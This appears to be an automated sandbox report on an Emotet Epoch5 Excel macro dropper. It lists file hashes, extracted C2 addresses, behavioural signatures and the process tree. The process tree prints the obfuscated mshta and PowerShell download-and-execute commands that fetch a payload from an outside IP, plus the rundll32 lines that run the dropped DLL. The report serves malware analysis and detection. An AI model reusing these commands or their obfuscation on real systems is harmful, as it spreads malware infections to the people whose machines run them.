Analysis

  • max time kernel
    150s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 04:16

General

  • Target

    TJCPC-0392446.xlsm

  • Size

    115KB

  • MD5

    48904e8844874c95e6ab3513f7374aca

  • SHA1

    b341da5b22ab387ac0a34a39f508702f8fbe8bc0

  • SHA256

    3b4c7690fa48369fdc9a684e697c5ba23a23d5e89955484364a79fc0e74c99de

  • SHA512

    c9d6b0e8a7e6093aa12cd634eabf9f7eb93ce21d611c8718e1656ee754d468b32282117d14275cb6737bc81dc1bd277443c201e8061acbd697c2ac5492e13a03

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TJCPC-0392446.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:952
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1344
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:676
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1380
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:812
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1336
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1612
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1080
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pzgbpzpajcacnc\uudhddgtxaahjx.wes",qfnjDimmymit
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1912
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pzgbpzpajcacnc\uudhddgtxaahjx.wes",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1824

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      844cc96ab10a5c8f75c28ab601c2add1

      SHA1

      da1d0e19e88f2d50a3b1c6af4f1592e3d75ad7cb

      SHA256

      7f6b13a289f2263bd6e0bf1b73c320ae9680a57d17fbb5e3b397749099bfc910

      SHA512

      7fc767d80a5cbed1652123b9029efdb1ecf67b5ccc90f2469edc0aa4e7ef0110cb7c092aecd909eac2046ce2be772300b847a7f04a61e52d11c8427b73a29387

    • \Users\Public\Documents\ssd.dll
      MD5

      844cc96ab10a5c8f75c28ab601c2add1

      SHA1

      da1d0e19e88f2d50a3b1c6af4f1592e3d75ad7cb

      SHA256

      7f6b13a289f2263bd6e0bf1b73c320ae9680a57d17fbb5e3b397749099bfc910

      SHA512

      7fc767d80a5cbed1652123b9029efdb1ecf67b5ccc90f2469edc0aa4e7ef0110cb7c092aecd909eac2046ce2be772300b847a7f04a61e52d11c8427b73a29387

    • \Users\Public\Documents\ssd.dll
      MD5

      844cc96ab10a5c8f75c28ab601c2add1

      SHA1

      da1d0e19e88f2d50a3b1c6af4f1592e3d75ad7cb

      SHA256

      7f6b13a289f2263bd6e0bf1b73c320ae9680a57d17fbb5e3b397749099bfc910

      SHA512

      7fc767d80a5cbed1652123b9029efdb1ecf67b5ccc90f2469edc0aa4e7ef0110cb7c092aecd909eac2046ce2be772300b847a7f04a61e52d11c8427b73a29387

    • \Users\Public\Documents\ssd.dll
      MD5

      844cc96ab10a5c8f75c28ab601c2add1

      SHA1

      da1d0e19e88f2d50a3b1c6af4f1592e3d75ad7cb

      SHA256

      7f6b13a289f2263bd6e0bf1b73c320ae9680a57d17fbb5e3b397749099bfc910

      SHA512

      7fc767d80a5cbed1652123b9029efdb1ecf67b5ccc90f2469edc0aa4e7ef0110cb7c092aecd909eac2046ce2be772300b847a7f04a61e52d11c8427b73a29387

    • \Users\Public\Documents\ssd.dll
      MD5

      844cc96ab10a5c8f75c28ab601c2add1

      SHA1

      da1d0e19e88f2d50a3b1c6af4f1592e3d75ad7cb

      SHA256

      7f6b13a289f2263bd6e0bf1b73c320ae9680a57d17fbb5e3b397749099bfc910

      SHA512

      7fc767d80a5cbed1652123b9029efdb1ecf67b5ccc90f2469edc0aa4e7ef0110cb7c092aecd909eac2046ce2be772300b847a7f04a61e52d11c8427b73a29387

    • \Users\Public\Documents\ssd.dll
      MD5

      844cc96ab10a5c8f75c28ab601c2add1

      SHA1

      da1d0e19e88f2d50a3b1c6af4f1592e3d75ad7cb

      SHA256

      7f6b13a289f2263bd6e0bf1b73c320ae9680a57d17fbb5e3b397749099bfc910

      SHA512

      7fc767d80a5cbed1652123b9029efdb1ecf67b5ccc90f2469edc0aa4e7ef0110cb7c092aecd909eac2046ce2be772300b847a7f04a61e52d11c8427b73a29387

    • \Users\Public\Documents\ssd.dll
      MD5

      844cc96ab10a5c8f75c28ab601c2add1

      SHA1

      da1d0e19e88f2d50a3b1c6af4f1592e3d75ad7cb

      SHA256

      7f6b13a289f2263bd6e0bf1b73c320ae9680a57d17fbb5e3b397749099bfc910

      SHA512

      7fc767d80a5cbed1652123b9029efdb1ecf67b5ccc90f2469edc0aa4e7ef0110cb7c092aecd909eac2046ce2be772300b847a7f04a61e52d11c8427b73a29387

    • \Users\Public\Documents\ssd.dll
      MD5

      844cc96ab10a5c8f75c28ab601c2add1

      SHA1

      da1d0e19e88f2d50a3b1c6af4f1592e3d75ad7cb

      SHA256

      7f6b13a289f2263bd6e0bf1b73c320ae9680a57d17fbb5e3b397749099bfc910

      SHA512

      7fc767d80a5cbed1652123b9029efdb1ecf67b5ccc90f2469edc0aa4e7ef0110cb7c092aecd909eac2046ce2be772300b847a7f04a61e52d11c8427b73a29387

    • \Users\Public\Documents\ssd.dll
      MD5

      844cc96ab10a5c8f75c28ab601c2add1

      SHA1

      da1d0e19e88f2d50a3b1c6af4f1592e3d75ad7cb

      SHA256

      7f6b13a289f2263bd6e0bf1b73c320ae9680a57d17fbb5e3b397749099bfc910

      SHA512

      7fc767d80a5cbed1652123b9029efdb1ecf67b5ccc90f2469edc0aa4e7ef0110cb7c092aecd909eac2046ce2be772300b847a7f04a61e52d11c8427b73a29387

    • memory/812-63-0x0000000002430000-0x000000000307A000-memory.dmp
      Filesize

      12.3MB

    • memory/812-62-0x0000000002430000-0x000000000307A000-memory.dmp
      Filesize

      12.3MB

    • memory/952-55-0x000000002F1C1000-0x000000002F1C4000-memory.dmp
      Filesize

      12KB

    • memory/952-58-0x0000000076B81000-0x0000000076B83000-memory.dmp
      Filesize

      8KB

    • memory/952-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/952-56-0x00000000718F1000-0x00000000718F3000-memory.dmp
      Filesize

      8KB

    • memory/1080-83-0x0000000001F10000-0x0000000001F38000-memory.dmp
      Filesize

      160KB

    • memory/1080-77-0x00000000001E0000-0x0000000000208000-memory.dmp
      Filesize

      160KB

    • memory/1080-85-0x0000000002110000-0x0000000002138000-memory.dmp
      Filesize

      160KB

    • memory/1080-87-0x0000000002770000-0x0000000002798000-memory.dmp
      Filesize

      160KB

    • memory/1080-90-0x00000000027A0000-0x00000000027C8000-memory.dmp
      Filesize

      160KB

    • memory/1344-59-0x000007FEFC2A1000-0x000007FEFC2A3000-memory.dmp
      Filesize

      8KB

    • memory/1612-70-0x00000000002B0000-0x00000000002D8000-memory.dmp
      Filesize

      160KB

    • memory/1824-95-0x00000000001B0000-0x00000000001D8000-memory.dmp
      Filesize

      160KB

    • memory/1824-97-0x0000000000250000-0x0000000000278000-memory.dmp
      Filesize

      160KB

    • memory/1824-99-0x0000000001E20000-0x0000000001E48000-memory.dmp
      Filesize

      160KB

    • memory/1824-101-0x0000000001E80000-0x0000000001EA8000-memory.dmp
      Filesize

      160KB

    • memory/1912-92-0x00000000001C0000-0x00000000001E8000-memory.dmp
      Filesize

      160KB